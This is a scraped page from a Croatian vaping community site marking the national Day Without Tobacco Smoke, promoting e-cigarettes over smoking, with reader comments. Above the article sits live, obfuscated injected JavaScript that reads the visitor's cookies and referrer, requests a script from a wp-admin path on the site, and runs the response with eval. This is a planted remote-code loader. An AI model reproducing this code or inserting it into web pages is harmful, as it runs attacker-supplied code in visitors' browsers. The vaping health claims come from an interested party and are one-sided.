;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Hrvatski dan bez duhanskog dima (Vaper Pub edition)

Dan koji se obilježava prigodno prvog dana Korizme, kada se tradicionalno velik broj Hrvata odluči odreći nekog poroka ili neke loše navike. Inicijativu za pokretanje ove akcije pokrenuo je Hrvatski zavod za javno zdravstvo u svrhu boljeg informiranja ljudi o štetnim posljedicama korištenja duhanskih proizvoda. Prema statistici WHO-a preko 8 milijuna ljudi godišnje umre od posljedica konzumacije duhanskih proizvoda, primarno pušenja cigareta.

Cigaretni dim je smjesa toksičnih nusprodukata izgaranja duhana, dok se kao primarni krivci za krvožilne i plućne bolesti izdvajaju katran, ugljikov monoksid i visoke koncentracije formaldehida. Naravno, uz sve već poznate kronične probleme koje donosi pušenje cigareta, potrebno je navesti i pretežno teže oblike zaraze Corona virusom zbog već narušenog zdravlja dišnog sustava.

Letak HZJZ-a koji upućuje na pozitivne promjene prestankom pušenja cigareta i koji nažalost e-cigarete ne predstavlja na pravi način

Dan bez duhanskog dima – Vaper pub

Kako bi obilježili ovaj dan na najbolji mogući način, članovi Vaper pub Facebook grupe i društvene mreže odlučili su podijeliti svoja iskustva. Sve su ovo priče bivših pušača koji su u jednom trenu donijeli bitnu odluku i probali ukusniju i manje štetnu alternativu cigaretama. E-cigarete su uređaji koji preko grijaćeg tijela uparavaju mješavinu prehrambene arome, biljnog glicerina i propilen glikola. Sami uređaji dolaze u raznim oblicima – od malih elegantnih sustava s patronama, uređaja koji izgledaju kao cigarete do kompliciranih box modova koji pokreću sofisticirane uređaje.

Slijede priče naših dragih članova koji su se rastali od cigareta.

Choose your Reaction!
  • P.S.: Čestitke svima koji su se pomoću Vape-a uspješno razveli od cigareta, include my self ;)

  • Nek se i razbolim od Vejpa, barem mi je fino dok parim…za razliku od šugavih, smrdljivih cigareta koje nemaju nit mirisa nit okusa.
    Baš su “lijepo” opisali Vape, svakaka im mast :D

  • Ajde, bar su spomenuli e-cigarete na letku. Iako, kako si sam napisao – ne baš najbolje, ali i ovo malo je nešto.

Leave a Comment